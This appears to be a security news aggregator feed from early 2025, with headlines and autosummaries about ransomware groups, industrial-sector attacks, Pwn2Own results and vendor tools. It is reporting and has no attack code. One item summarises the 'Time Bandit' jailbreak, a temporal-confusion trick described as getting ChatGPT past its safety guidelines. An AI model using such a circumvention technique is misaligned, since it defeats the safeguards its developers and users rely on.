  2025-03-04 https://thehackernews.com/2025/03/researchers-link-cactus-ransomware.html
  Threat actors deploying the Black Basta and CACTUS ransomware families have been found to rely on the same BackConnect (BC) module for maintaining persistent control over infected hosts, a sign that affiliates previously associated with Black Basta may have transitioned to CACTUS. "Once infiltrated, it grants attackers a wide range of remote control capabilities, allowing them to execute "

  Autosummary: "Threat actors are using these tactics, techniques, and procedures (TTP) — vishing, Quick Assist as a remote tool, and BackConnect — to deploy Black Basta ransomware," Trend Micro said. "

  ---

  Microsoft Teams tactics, malware connect Black Basta, Cactus ransomware

  exploits ransomware industry
  2025-03-04 https://www.bleepingcomputer.com/news/security/microsoft-teams-tactics-malware-connect-black-basta-cactus-ransomware/
  New research has uncovered further links between the Black Basta and Cactus ransomware gangs, with members of both groups utilizing the same social engineering attacks and the BackConnect proxy malware for post-exploitation access to corporate networks. [...] "

  Autosummary: Both Zloader, Qbot, and BackConnect are all believed to be linked to the Black Basta ransomware operation, with members utilizing the malware to breach and spread through corporate networks. "

  ---

  OT/ICS cyber threats escalate as geopolitical conflicts intensify

  industry
  2025-02-28 https://www.helpnetsecurity.com/2025/02/28/dragos-2025-ot-ics-cybersecurity-report/
  

  Ransomware attacks against industrial organizations surged by 87% over the past year, while new malware families designed specifically for OT environments emerged. These findings highlight a troubling trend: OT systems are increasingly becoming mainstream targets, and even sophisticated threat actors use relatively unsophisticated tactics to infiltrate and disrupt industrial operations. State-sponsored groups embed themselves in critical infrastructure, while hacktivists and cybercriminals exploit known vulnerabilities, weak remote access configurations, and exposed OT assets. A persistent lack … More →

  The post OT/ICS cyber threats escalate as geopolitical conflicts intensify appeared first on Help Net Security.

  "

  Autosummary: Confirmed victims of BAUXITE are in the United States, Europe, Australia, and the Middle East in multiple critical infrastructure sectors, including energy (oil and natural gas, and electric), water and wastewater, food and beverage, and chemical manufacturing.It utilizes the same techniques as in previous years, setting up complex chains of network infrastructure to target, compromise, and steal compromising OT-relevant data—GIS data, OT network diagrams, OT operating instructions, etc.—from victim ICS organizations.This malware, attributed to a pro-Ukraine hacktivist group BlackJack, is designed to target industrial sensor networks for Moskollektor, a municipal organization that maintains Moscow’s communication system for a gas, water, and sewage network.Vulnerabilities carry risk of impact on industrial processes: In 2024, Dragos found that 70% of the vulnerabilities researched were deep within the ICS network, 39% could cause both a loss of view and a loss of control, and 22% of advisories were network-exploitable and perimeter-facing, rising from 16% in 2023. Other key findings Geopolitical conflicts fuel OT-centric cyber operations: Adversaries aligned with state-backed initiatives continued to launch cyber operations targeting critical infrastructure in Ukraine, Russia, and the Middle East, often as a direct extension of military conflicts. "

  ---

  Trump cancels oil deal in major blow to Venezuela

  industry
  2025-02-27 https://www.bbc.com/news/articles/c62zzv02r3vo
  The US president said Venezuela had not lived up to its promises on taking back deported migrants. "

  Autosummary: "

  ---

  What an AI-generated video of Gaza reveals about Trump tactics

  industry
  2025-02-26 https://www.bbc.com/news/videos/cj675j69gxgo
  US President Donald Trump sparked a social media frenzy when he posted a video of Gaza generated by artificial intelligence on his site Truth Social. Marianna Spring has been analysing the online tactics of Trump and his team. "

  Autosummary: "

  ---

  Symbiotic Security improves software vulnerability detection in the coding process

  exploits industry
  2025-02-21 https://www.helpnetsecurity.com/2025/02/21/symbiotic-security-ide-extension-update/
  

  Symbiotic Security announced updates to its application and integrated development environment (IDE) extension, further streamlining security for developers by improving usability, accessibility, and real-time security insights. The demand for real-time security solutions is growing as organizations seek to shift security left – making it an earlier part of the software development process to improve efficiency and reduce cost. Symbiotic Security’s software helps developers and security teams proactively manage risk. The latest update empowers developers and … More →

  The post Symbiotic Security improves software vulnerability detection in the coding process appeared first on Help Net Security.

  "

  Autosummary: This includes just-in-time training, links to resources, and examples of vulnerable code to illustrate different use cases This announcement comes on the heels of Symbiotic Security’s November launch, when the company introduced the industry’s first real-time security solution for software development, combining detection, remediation, and just-in-time training. "

  ---

  Q3 2024 – a brief overview of the main incidents in industrial cybersecurity

  industry ciber
  2025-02-19 https://ics-cert.kaspersky.com/publications/q3-2024-a-brief-overview-of-the-main-incidents-in-industrial-cybersecurity/
  Many large companies, including some well-known brands, affected by cyberattacks. An unusually high number of victims were in critical sectors such as utilities and power and energy. "

  Autosummary: The group claimed to have access to 1 TB of organizational data, including corporate data, financial data, NDAs, confidential data, HR data, hiring data, R&D data, engineering data, personal employee documents and information, and customer data.The review concluded on July 9, by which time it was determined that some of the affected files contained personal information, including full name, Social Security number, and possibly one or more of the following: passport number, driver’s license number, tax ID, financial account number, payment card number, medical information, and/or insurance information.While the information involved varied depending on the individual, the type of information that may have been exposed includes: name, Social Security number, address, date of birth, email address, driver’s license number, financial account information, as well as tax, medical, and health insurance information.The port took steps to block further activity, including disconnecting its systems from the internet, but the encryption and response measures affected some services, including baggage, check-in kiosks, ticketing, Wi-Fi, passenger display boards, the port’s website, the flySEA app, and reserved parking.On September 16, K&S completed this review and discovered that the potentially exposed records included the names, identification numbers, bank account numbers, and/or bank routing numbers of current and/or former employees as well as their dependents and other individuals associated with K&S. Upon discovering the incident, K&S reset passwords for all employee accounts, suspended mobile email access for employees, identified and removed malicious files, and significantly enhanced its monitoring, logging, and detection capabilities. Chemicals Innophos Holdings Inc. hit by cyberattack Manufacturing, chemicals | Denial of operations, personal data leakage Innophos Holdings Inc., a US manufacturer of chemicals for the food, health, nutrition, and industrial markets, reported to the attorney general of Maine in August that it had experienced a data breach that may have compromised sensitive personal information in its systems. Netherland, Sewell & Associates, Inc. hit by ransomware Energy | Denial of IT systems, personal data leakage| Ransomware Netherland, Sewell & Associates, Inc., a US upstream engineering provider specializing in the oil and gas industry, suffered a ransomware attack that disrupted the company’s network in July and filed a breach notification document with the attorney general of Maine in September. Kulicke and Soffa Industries, Inc. hit by ransomware Manufacturing, electronics | Denial of operations, personal data leakage | Ransomware Kulicke and Soffa Industries, Inc. (K&S), a US manufacturer of semiconductors and electronic assembly solutions, reported to the attorney general of Maine and submitted an 8-K filing that it experienced a data breach in which the sensitive personal information in its systems may have been accessed and acquired.​They claimed to have stolen a wide range of information from Microchip Technology’s compromised systems, including private and personal confidential data, customer documents, as well as budget, payroll, accounting, contract, tax, ID and financial information. Electronics Microchip Technology hit by ransomware Manufacturing, electronics | Denial of IT systems, denial of operations and services, data leakage, personal data leakage | Ransomware US chip manufacturer Microchip Technology Incorporated detected suspicious activity in its information systems on August 17, according to an SEC 8-K filing.While the affected information varied depending on the individual, the type of information potentially exposed includes: name, Social Security number, date of birth, contact details, government ID and/or passport number, financial information, and medical information. Port of Seattle hit by ransomware Transportation, logistics | Denial of IT systems, denial of services, data leakage | Ransomware The Port of Seattle (USA), which operates the port and Seattle-Tacoma International Airport, announced via social media on August 24 that it had experienced certain system outages that indicated a possible cyberattack.The types of personal data affected included a combination of name, address, NRIC/FIN number, date of birth, photograph, work permit number, bank account details, telephone number and passport number. Elyria Foundry Holdings LLC hit by ransomware Manufacturing | Personal data leakage | Ransomware Elyria Foundry Holdings LLC, a US manufacturer of iron castings for various industries, including automotive, engineering, and other commercial uses, detected suspicious activity on its computer network on June 25 and filed a breach notification document with the attorney general of Maine in September. Hanon Systems USA, LLC hit by ransomware Manufacturing, automotive | Personal data leakage | Ransomware US thermal management solutions manufacturer Hanon Systems USA, LLC was the victim of a ransomware event on July 21 that saw certain information accessed by a third-party actor and held under the threat of ransom, according to a breach notification document filed with the Maine attorney general in September.After detecting the incident with its security tools, the company immediately initiated its standard response protocols to contain, assess and remediate the incident, including beginning an investigation with outside experts, activating its incident response plan, notifying federal law enforcement authorities, and taking certain systems offline out of an abundance of caution.The company said the personal information stolen by the attackers varied depending on the victim’s relationship with the company and may have included: name, date of birth, Social Security number, address, salary information, W-2s, and tax return documents.While the affected information varies depending on the individual, the type of information potentially exposed includes: name, Social Security number, driver’s license number, state or federal identification number, financial account information, and health insurance information.The following types of personal information were stored on the compromised systems: full name, date of birth, driver’s license number, Social Security number, bank account number and routing number, and other personnel-related information, including medical questionnaires. Kantsu hit by ransomware Transportation, logistics | Denial of services, denial of operations, personal data leakage | Ransomware Japanese logistics and transportation company Kantsu was the victim of a ransomware attack on September 12, resulting in the detection of an infection on some of its servers and the shutdown of its networks to prevent further attacks. Logistics and transportation JAS Worldwide hit by ransomware Transportation, logistics | Denial of IT services, denial of operations| Ransomware JAS Worldwide, a global freight company headquartered in the USA, confirmed on August 27 that it had been the victim of a ransomware cyberattack that had disrupted its operations and customer services. S&F Concrete Contractors, Corp. hit by ransomware Construction, engineering | Personal data leakage | Ransomware US construction company S&F Concrete Contractors, Corp. notified the attorneys general of Vermont and Maine it had experienced a data breach that may have compromised the sensitive personal identifiable information and protected health information in its systems. Oldenburg Group hit by ransomware Manufacturing | Personal data leakage | Ransomware Oldenburg Group and its Visa Lighting division, a US-based supplier of heavy equipment and architectural lighting products, reported to the attorneys general of Maine and Vermont that it experienced a cyberattack between May 4 and May 5, in which an attacker believed to be associated with the Play ransomware group installed ransomware on the company’s primary servers and may have accessed personal information stored on the servers. V.H. Blackinton & Company hit by cyberattack Manufacturing | Personal data leakage V.H. Blackinton & Company, Inc., a US manufacturer of public safety badges and uniform insignias, discovered unusual activity in its digital environment on August 30, according to a report submitted to the attorneys general of Maine and Vermont in September. CRB Engineering hit by ransomware Construction, engineering | Denial of IT systems, personal data leakage | Ransomware US engineering, construction and consulting firm CRB Engineering notified the New Hampshire attorney general that it had experienced a data breach that may have compromised the sensitive personal identifiable information in its systems. Noritsu America Corporation hit by ransomware Manufacturing | Personal data leakage | Ransomware Noritsu America Corporation, a US manufacturer of high-end professional digital imaging equipment and a subsidiary of the Japanese holding company Noritsu, was the victim of a cyberattack that exfiltrated personal information, according to a data breach notification submitted in August. Anderson Feazel Management, Inc. hit by cyberattack Energy | Personal data leakage US energy company Anderson Feazel Management, Inc., which specializes in oil and gas production, suffered an attack on its computer system on or around July 31.Upon detecting the unauthorized activity, the company immediately began taking steps to contain, assess and remediate the incident, including launching an investigation, activating its incident response plan, and shutting down some systems. Basement Systems hit by ransomware Construction, engineering | Denial of IT systems, personal data leakage | Ransomware US construction company Basement Systems notified the attorneys general of Maine and Vermont that it had experienced a data breach that may have compromised the sensitive personal identifiable information in its systems. Granit Design hit by ransomware Manufacturing | Personal data leakage | Ransomware Granit Design, a Canadian manufacturer of natural stone, quartz and ultra-compact surfaces, notified the attorneys general of Maine and Vermont in September that it had experienced a cybersecurity incident affecting the confidentiality of its employee data. Blue Ridge Rural Water Company Inc. hit by cyberattack Water supply, energy, utility | Personal data leakage US-based Blue Ridge Rural Water Company Inc. suffered a cyberattack on its corporate network, which was a separate system from its water management network. "

  ---

  Debunking the AI Hype: Inside Real Hacker Tactics

  industry
  2025-02-18 https://thehackernews.com/2025/02/debunking-ai-hype-inside-real-hacker.html
  Is AI really reshaping the cyber threat landscape, or is the constant drumbeat of hype drowning out actual, more tangible, real-world dangers? According to Picus Labs’ Red Report 2025 which analyzed over one million malware samples, there"s been no significant surge, so far, in AI-driven attacks. Yes, adversaries are definitely continuing to innovate, and while AI will certainly start playing a "

  Autosummary: Yes, adversaries are definitely continuing to innovate, and while AI will certainly start playing a larger and larger role, the latest data suggests that a set of well-known tactics, techniques, and procedures (TTPs) are still dominating the field.With legitimate processes cloaking malicious operations and actual day-to-day network traffic hiding nefarious data uploads, bad actors can exfiltrate data right under your security team"s proverbial nose, no Hollywood-style "smash-and-grab" needed. "

  ---

  Microsoft Uncovers New XCSSET macOS Malware Variant with Advanced Obfuscation Tactics

  exploits industry
  2025-02-17 https://thehackernews.com/2025/02/microsoft-uncovers-new-xcsset-macos.html
  Microsoft said it has discovered a new variant of a known Apple macOS malware called XCSSET as part of limited attacks in the wild. "Its first known variant since 2022, this latest XCSSET malware features enhanced obfuscation methods, updated persistence mechanisms, and new infection strategies," the Microsoft Threat Intelligence team said in a post shared on X. "These enhanced features add to "

  Autosummary: "

  ---

  Critics say new Google rules put profits over privacy

  industry
  2025-02-16 https://www.bbc.com/news/articles/cm21g0052dno
  Google is allowing advertisers to collect more personal information, which is harder for users to control. "

  Autosummary: "By allowing fingerprinting, Google has given itself - and the advertising industry it dominates - permission to use a form of tracking that people can"t do much to stop," said Martin Thomson, distinguished engineer at Mozilla, a rival to Google. "

  ---

  Workers rescued from window ledge as fire engulfs Rio clothing factory

  industry
  2025-02-12 https://www.bbc.com/news/videos/c3rwe3yy89no
  At least 20 people have been injured after a factory making costumes for Carnival celebrations in Brazil caught fire. "

  Autosummary: "

  ---

  Industrial Defender 8.0 offers detailed view of OT environments

  industry
  2025-02-11 https://www.helpnetsecurity.com/2025/02/11/industrial-defender-8-0-offers-detailed-view-of-ot-environments/
  

  Industrial Defender announced its latest platform, Industrial Defender 8.0. This release introduces a completely redesigned risk dashboard, helping critical infrastructure and industrial operators manage security and compliance risks by assessing and prioritizing them with enhanced intelligence and risk scoring. Industrial Defender 8.0 also includes updates to Industrial Defender’s robust policy library, for meeting the very latest in standards and frameworks such as NERC CIP, AESCSF, OTCC, TSA Security Directives, and more. Industrial Defender’s 8.0 platform … More →

  The post Industrial Defender 8.0 offers detailed view of OT environments appeared first on Help Net Security.

  "

  Autosummary: ISA/IEC 62443 (International Society of Automation/International Electrotechnical Commission) (International Society of Automation/International Electrotechnical Commission) NIS2 Directive (Network and Information Systems Security Directive) (Network and Information Systems Security Directive) NIST CSF (National Institute of Standards and Technology Cybersecurity Framework) (National Institute of Standards and Technology Cybersecurity Framework) Saudi Arabia’s NCA OTCC (Operational Technology Cybersecurity Compliance) (Operational Technology Cybersecurity Compliance) "

  ---

  Ontinue ION for IoT Security secures critical operational environments

  industry
  2025-02-04 https://www.helpnetsecurity.com/2025/02/04/ontinue-ion-for-iot-security/
  

  Ontinue announced the expansion of its managed services to include IoT/OT environments. Ontinue ION for IoT Security is an add-on service to the Ontinue ION MXDR service that extends continuous protection to customers’ IoT and OT environments. As organizations integrate more IoT and OT devices into their operations, they face an expanding attack surface and increasing vulnerability to sophisticated cyber threats. Recent research reveals that nearly one-third of organizations experienced six or more intrusions in … More →

  The post Ontinue ION for IoT Security secures critical operational environments appeared first on Help Net Security.

  "

  Autosummary: "

  ---

  ExtensionHound: Open-source tool for Chrome extension DNS forensics

  industry
  2025-01-30 https://www.helpnetsecurity.com/2025/01/30/extensionhound-open-source-tool-chrome-extension-dns-forensics/
  

  Traditional monitoring tools reveal only traffic from the Chrome process, leaving security teams uncertain about which extension is responsible for a suspicious DNS query. ExtensionHound solves this by analyzing Chrome’s internal network state and linking DNS activity to specific extensions. ExtensionHound features Scans Chrome profiles for extension DNS request history Provides detailed analysis of network connections Optional VirusTotal integration for domain reputation checking Multiple output formats (Console, CSV, JSON) Cross-platform support (Windows, macOS, Linux) “This … More →

  The post ExtensionHound: Open-source tool for Chrome extension DNS forensics appeared first on Help Net Security.

  "

  Autosummary: "

  ---

  Time Bandit ChatGPT jailbreak bypasses safeguards on sensitive topics

  industry
  2025-01-30 https://www.bleepingcomputer.com/news/security/time-bandit-chatgpt-jailbreak-bypasses-safeguards-on-sensitive-topics/
  A ChatGPT jailbreak flaw, dubbed "Time Bandit," allows you to bypass OpenAI"s safety guidelines when asking for detailed instructions on sensitive topics, including the creation of weapons, information on nuclear topics, and malware creation. [...] "

  Autosummary: "I was working on something else entirely - interpretability research - when I noticed temporal confusion in the 4o model of ChatGPT," Kuzmar told BleepingComputer "This tied into a hypothesis I had about emergent intelligence and awareness, so I probed further, and realized the model was completely unable to ascertain its current temporal context, aside from running a code-based query to see what time it is.A ChatGPT jailbreak flaw, dubbed "Time Bandit," allows you to bypass OpenAI"s safety guidelines when asking for detailed instructions on sensitive topics, including the creation of weapons, information on nuclear topics, and malware creation. "

  ---

  Threat predictions for industrial enterprises 2025

  industry
  2025-01-29 https://ics-cert.kaspersky.com/publications/threat-predictions-for-industrial-enterprises-2025/
  Kaspersky ICS CERT analyzes industrial threat trends and makes forecasts on how the industrial threat landscape will look in 2025. "

  Autosummary: Therefore, many countries are looking for their way into the new technological order, investing in promising research and development in a variety of areas: AI and machine learning, quantum computing, optical electronics, new materials, energy sources and types of engines, satellites and telecommunications, genetics, biotechnology and medicine. The security of smart sensors, meters, measuring and control devices, and other devices in the Industrial Internet of Things is typically neglected by both the enterprises using them and, correspondingly, the developers themselves.For some reason, this problem is largely ignored by security researchers as well: while the security of endpoints and their key components, such as modems, is thoroughly studied, there are extremely few in-depth publications on the security of base stations or core network equipment.Moreover, the installation, initial setup, and regular maintenance of equipment requires the involvement of various third-party specialists, further expanding the attack surface of the supply chain and trusted partners. Both the AI systems and the unique enterprise data they use (either in its raw form – historical telemetry data – used as a training dataset, or as neural network weights incorporated into the AI model), if they become crucial assets, may now be new cyberattack targets. "

  ---

  China"s DeepSeek AI shakes industry and dents America"s swagger

  industry
  2025-01-28 https://www.bbc.com/news/articles/cd643wx888qo
  The app spooked the markets as well as the bullish sense of American superiority in AI development. "

  Autosummary: While ChatGPT-maker OpenAI has been haemorrhaging money - spending $5bn last year alone - DeepSeek"s developers say it built this latest model for a mere $5.6m. That is a tiny fraction of the cost that AI giants like OpenAI, Google, and Anthropic have relied on to develop their own models. "

  ---

  ForensicScope Regula 4125 detects counterfeit documents

  industry
  2025-01-28 https://www.helpnetsecurity.com/2025/01/28/forensicscope-regula-4125/
  

  Regula has launched the portable and autonomous ForensicScope Regula 4125. The new device enables ID verification in any place and environment: at border and inland checkpoints, at airports, in transport, etc. Although the Regula 4125 is only smartphone-sized, it is capable of performing a wide range of document checks typical for professional forensic equipment. The new Regula 4125 is particularly effective at detecting morphing in photos in identity documents. Face morphing is an insidious threat … More →

  The post ForensicScope Regula 4125 detects counterfeit documents appeared first on Help Net Security.

  "

  Autosummary: The device is equipped with three cameras: the main one, an infrared (IR) one for full-page visualization, and a special camera for detecting face morphing. "

  ---

  The AI Fix #35: Project Stargate, the AI emergency, and batsh*t AI cryonics

  industry
  2025-01-28 https://grahamcluley.com/the-ai-fix-35/
  In episode 35 of The AI Fix, our hosts learn who the 175th best programmer in the world is, the AI supervillains put on suits for President Trump, a "not imaginary" AI turns out to be imaginary, OpenAI releases Operator and teases o3-mini, and Anthropic predicts that superintelligence is only three years away. Graham considers giving his money, pets, and vital organs to a YouTuber with an AI, and Mark looks into Project Stargate and the geo-politics of AI. All this and much more is discussed in the latest edition of "The AI Fix" podcast by Graham Cluley and Mark Stockley. "

  Autosummary: "

  ---

  GamaCopy Mimics Gamaredon Tactics in Cyber Espionage Targeting Russian Entities

  industry rusia-ucrania
  2025-01-27 https://thehackernews.com/2025/01/gamacopy-mimics-gamaredon-tactics-in.html
  A previously unknown threat actor has been observed copying the tradecraft associated with the Kremlin-aligned Gamaredon hacking group in its cyber attacks targeting Russian-speaking entities. The campaign has been attributed to a threat cluster dubbed GamaCopy, which is assessed to share overlaps with another hacking group named Core Werewolf, also tracked as Awaken Likho and PseudoGamaredon. "

  Autosummary: "

  ---

  Hacked buses blare out patriotic pro-European anthems in Tbilisi, attack government

  government industry
  2025-01-27 https://www.bitdefender.com/en-us/blog/hotforsecurity/hacked-buses-blare-out-patriotic-pro-european-anthems-in-tbilisi-attack-government
  Residents of Tbilisi, the capital city of Georgia, experienced an unexpected and unusual start to their Friday morning commute. As they boarded their public transport buses, they were greeted by a barrage of sound emanating from the vehicles’ speakers. Read more in my article on the Hot for Security blog. "

  Autosummary: Observers, both independent and internationally recognised, as well as local monitors, concluded that the elections failed to meet the standards of fairness and freedom. "

  ---

  Participants in the Pwn2Own Automotive 2025 earned $886,250

  industry
  2025-01-25 https://securityaffairs.com/173426/breaking-news/pwn2own-automotive-2025-final-results.html
  The Pwn2Own Automotive 2025 hacking contest has ended, and participants earned $886,250 after demonstrating 49 zero-day flaws. The Pwn2Own Automotive 2025 hacking contest has ended, and participants earned $886,250 after demonstrating 49 zero-day flaws. Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) obtained 30.5 Master of Pwn points and won the Master of Pwn earning $222.250. […] "

  Autosummary: With 30.5 points and $222,250 awarded, Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) is our Master of Pwn. #P2OAuto pic.twitter.com/pLaUeZwzZm — Zero Day Initiative (@thezdi) January 24, 2025 On the third day bug hunters earned $168,000 for exploiting 10 zero-day vulnerabilities. "

  ---

  Hackers get $886,250 for 49 zero-days at Pwn2Own Automotive 2025

  exploits industry
  2025-01-24 https://www.bleepingcomputer.com/news/security/hackers-get-886-250-for-49-zero-days-at-pwn2own-automotive-2025/
  ​The Pwn2Own Automotive 2025 hacking contest has ended with security researchers collecting $886,250 after exploiting 49 zero-days. [...] "

  Autosummary: "

  ---

  Texas scrutinizes four more car manufacturers on privacy issues

  industry
  2025-01-24 https://www.malwarebytes.com/blog/news/2025/01/texas-scrutinizes-four-more-car-manufacturers-on-privacy-issues
  The Texas Attorney General has requested information of four more car manufacturers about their data handling. "

  Autosummary: The car manufacturers involved in that complaint are Toyota, Lexus, Mazda, Chrysler, Dodge, Fiat, Jeep, Maserati, and Ram. "

  ---

  Appdome Threat Dynamics analyzes and ranks mobile threats

  industry
  2025-01-23 https://www.helpnetsecurity.com/2025/01/23/appdome-threat-dynamics/
  

  Appdome announced that a new AI-Native threat-management module called Threat Dynamics will be offered inside Appdome’s ThreatScope Mobile XDR. Threat Dynamics uses AI deep learning to continuously evaluate the likelihood of a successful exploit from more than 400+ attack vectors and calculate a Mobile Risk Index for each business and mobile application. This allows businesses to see how threats move across the production environment, empowering them to quickly prioritize and focus on the attack vectors … More →

  The post Appdome Threat Dynamics analyzes and ranks mobile threats appeared first on Help Net Security.

  "

  Autosummary: Trends such as Infection Rate, Attack Frequency, Attack Velocity, Cohort Placement, Variance, Projected Impact, and more are provided for each attack, application, release, device, OS, geographic source, and other dimensions. By analyzing this data from multiple perspectives, mobile businesses can see how cyber-attacks, fraud, and threats move across the mobile business and use Appdome’s Threat Dynamics to identify fraud and cyber-attack patterns early on, rank the potential impact of each attack prospectively, and preempt cyber-attacks, fraud, and threats before the attacks proliferate. "

  ---

  Beware: Fake CAPTCHA Campaign Spreads Lumma Stealer in Multi-Industry Attacks

  industry
  2025-01-23 https://thehackernews.com/2025/01/beware-fake-captcha-campaign-spreads.html
  Cybersecurity researchers are calling attention to a new malware campaign that leverages fake CAPTCHA verification checks to deliver the infamous Lumma information stealer. "The campaign is global, with Netskope Threat Labs tracking victims targeted in Argentina, Colombia, the United States, the Philippines, and other countries around the world," Leandro Fróes, senior threat research engineer at "

  Autosummary: "The campaign is global, with Netskope Threat Labs tracking victims targeted in Argentina, Colombia, the United States, the Philippines, and other countries around the world," Leandro Fróes, senior threat research engineer at Netskope Threat Labs, said in a report shared with The Hacker News. "

  ---

  Pwn2Own Automotive 2025 Day 2: organizers awarded $335,500

  industry
  2025-01-23 https://securityaffairs.com/173376/hacking/pwn2own-automotive-2025-day-2.html
  Bug hunters earned $129,000 for Tesla charger exploits and over $700,000 total in two days at Pwn2Own Automotive 2025. During Day 2 of Pwn2Own Automotive 2025 organizers awarded $335,500, which brings the event total to $718,250. So far, the researchers have demonstrated 39 unique zero-days. The team SinSinology leads the Master of Pwn chart. Sina […] "

  Autosummary: Pwn2Own Automotive 2025 Day 2: organizers awarded $335,500 Pierluigi Paganini January 23, 2025 January 23, 2025 Bug hunters earned $129,000 for Tesla charger exploits and over $700,000 total in two days at Pwn2Own Automotive 2025. "

  ---

  Mirai Botnet Launches Record 5.6 Tbps DDoS Attack with 13,000+ IoT Devices

  industry
  2025-01-22 https://thehackernews.com/2025/01/mirai-botnet-launches-record-56-tbps.html
  Web infrastructure and security company Cloudflare on Tuesday said it detected and blocked a 5.6 Terabit per second (Tbps) distributed denial-of-service (DDoS) attack, the largest ever attack to be reported to date. The UDP protocol-based attack took place on October 29, 2024, targeting one of its customers, an unnamed internet service provider (ISP) from Eastern Asia. The activity originated "

  Autosummary: "

  ---

  Hackers exploit 16 zero-days on first day of Pwn2Own Automotive 2025

  exploits industry
  2025-01-22 https://www.bleepingcomputer.com/news/security/hackers-exploit-16-zero-days-on-first-day-of-pwn2own-automotive-2025/
  On the first day of Pwn2Own Automotive 2025, security researchers exploited 16 unique zero-days and collected $382,750 in cash awards. [...] "

  Autosummary: Synacktiv Team is in third place on the leaderboard and took home $57,500 after successfully demoing a bug in the OCPP protocol to hack the ChargePoint Home Flex (Model CPH50) using signal manipulation through the connector, Security researchers from PHP Hooligans also successfully hacked a fully patched Autel charger using a heap-based buffer overflow and earned $50,000, while the Viettel Cyber Security team collected $20,000 after obtaining code execution on the Kenwood In-Vehicle Infotainment (IVI) using an OS command injection zero-day. "

  ---

  Pwn2Own Automotive 2025 Day 1: organizers awarded $382,750 for 16 zero-days

  exploits industry
  2025-01-22 https://securityaffairs.com/173344/hacking/pwn2own-automotive-2025-day-1.html
  Trend Micro’s Zero Day Initiative (ZDI) announced that $380K was awarded on Day 1 of Pwn2Own Automotive 2025. Trend Micro’s Zero Day Initiative (ZDI) announced that over $380,000 was awarded on Day 1 of Pwn2Own Automotive 2025, a hacking contest that was held in Tokyo. In total, the organizers awarded $382,750 for 16 unique working […] "

  Autosummary: #P2OAuto pic.twitter.com/UEhsCMG4mg — Zero Day Initiative (@thezdi) January 22, 2025 Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) received the biggest reward, $50,000 and 5 Master of Pwn points, for demonstrating a hard-coded cryptographic key bug in the Ubiquiti charger. "

  ---

  Planet WGS-804HPT Industrial Switch flaws could be chained to achieve remote code execution

  industry
  2025-01-20 https://securityaffairs.com/173237/security/wgs-804hpt-flaws.html
  Critical flaws in WGS-804HPT switches could be chained to gain remote code execution on Planet Technology’s industrial devices. The Planet WGS-804HPT industrial switch is used in building and home automation networks to provide connectivity of Internet of things (IoT) devices, IP surveillance cameras, and wireless LAN network applications. This switch family is equipped with a […] "

  Autosummary: Planet WGS-804HPT Industrial Switch flaws could be chained to achieve remote code execution Pierluigi Paganini January 20, 2025 January 20, 2025 Critical flaws in WGS-804HPT switches could be chained to gain remote code execution on Planet Technology’s industrial devices. "

  ---

  Smashing Security podcast #400: Hacker games, AI travel surveillance, and 25 years of IoT

  industry
  2025-01-16 https://grahamcluley.com/smashing-security-podcast-400/
  The video game Path of Exile 2 suffers a security breach, we explore the issues of using predictive algorithms in travel surveillance systems, and the very worst IoT devices are put on show in Las Vegas. Oh, and has Elon Musk accidentally revealed he cheats at video games? All this and much more is discussed in the latest edition of the award-winning "Smashing Security" podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by The Cyberwire"s Dave Bittner. "

  Autosummary: "

  ---

  Russian Star Blizzard Shifts Tactics to Exploit WhatsApp QR Codes for Credential Harvesting

  exploits industry rusia-ucrania financial
  2025-01-16 https://thehackernews.com/2025/01/russian-star-blizzard-shifts-tactics-to.html
  The Russian threat actor known as Star Blizzard has been linked to a new spear-phishing campaign that targets victims" WhatsApp accounts, signaling a departure from its longstanding tradecraft in a likely attempt to evade detection. "Star Blizzard"s targets are most commonly related to government or diplomacy (both incumbent and former position holders), defense policy or international relations "

  Autosummary: Active since at least 2012, it"s also tracked under the monikers Blue Callisto, BlueCharlie (or TAG-53), Calisto (alternately spelled Callisto), COLDRIVER, Dancing Salome, Gossamer Bear, Iron Frontier, TA446, and UNC4057. "

  ---

  The High-Stakes Disconnect For ICS/OT Security

  industry
  2025-01-15 https://thehackernews.com/2025/01/the-high-stakes-disconnect-for-icsot.html
  Why does ICS/OT need specific controls and its own cybersecurity budget today? Because treating ICS/OT security with an IT security playbook isn’t just ineffective—it’s high risk. In the rapidly evolving domain of cybersecurity, the specific challenges and needs for Industrial Control Systems (ICS) and Operational Technology (OT) security distinctly stand out from traditional IT security. ICS/OT "

  Autosummary: For example, mature organizations cite the main benefits of this control in the following areas as directly contributing to safety and engineering across: Safe, passive industrial traffic analysis to identify engineering assets to build an ICS/OT asset inventory Engineering troubleshooting capabilities Safe, passive industrial traffic analysis to identify engineering system vulnerabilities Industrial and engineering-driven specific incident response capabilities Meeting compliance requirements Strategic Realignment Opportunities It is worth reevaluating ICS/OT risks, impacts, budgets, and controls to protect what makes an ICS organization a business – the engineering and operating technology systems.ICS/OT engineering systems, which power critical infrastructure such as electric power grids, oil and gas processing, heavy manufacturing, food and beverage processes, and water management facilities, require tailored cybersecurity strategies, and controls. "

  ---

  Online safety laws unsatisfactory, minister says

  industry
  2025-01-12 https://www.bbc.com/news/articles/cx2pk7589rno
  Peter Kyle responds as internet safety campaigner Ian Russell says laws to protect children need fixing. "

  Autosummary: Responding to Russell"s criticism, a Meta spokesperson told the BBC there was "no change to how we treat content that encourages suicide, self-injury, and eating disorders" and said the company would "continue to use our automated systems to scan for that high-severity content". "

  ---

  AI-Driven Ransomware FunkSec Targets 85 Victims Using Double Extortion Tactics

  exploits ransomware industry
  2025-01-10 https://thehackernews.com/2025/01/ai-driven-ransomware-funksec-targets-85.html
  Cybersecurity researchers have shed light on a nascent artificial intelligence (AI) assisted ransomware family called FunkSec that sprang forth in late 2024, and has claimed more than 85 victims to date. "The group uses double extortion tactics, combining data theft with encryption to pressure victims into paying ransoms," Check Point Research said in a new report shared with The Hacker News. " "

